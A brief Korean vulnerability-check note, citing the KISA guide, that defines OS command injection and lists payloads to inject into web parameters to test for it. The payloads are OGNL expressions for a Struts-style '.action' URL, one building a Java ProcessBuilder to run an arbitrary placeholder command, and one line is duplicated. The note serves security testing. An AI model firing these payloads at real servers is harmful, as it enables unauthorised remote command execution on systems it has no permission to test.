운영체제 명령 실행 (Command Injection)

KISA 가이드

 

운영체제 명령 실행(Command Injection)이란?

사용자 입력 값에 의해 시스템 명령어가 실행되는 취약점

사용자 입력 폼, 쿠키, 파라미터, HTTP 헤더 등을 시스템 셸에 전달할 때 공격이 발생

 

점검 방법

웹에서 전달되는 파라미터 값에 공개적으로 알려진 운영체제 명령 실행 코드 삽입

명령어 실행되는지 확인

 

[삽입할 명령어]

example/X.action?action:%25{3\*4}

example/X.action?action:%25{3\*4}

example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String\[\]{'command','goes','here'})).start()}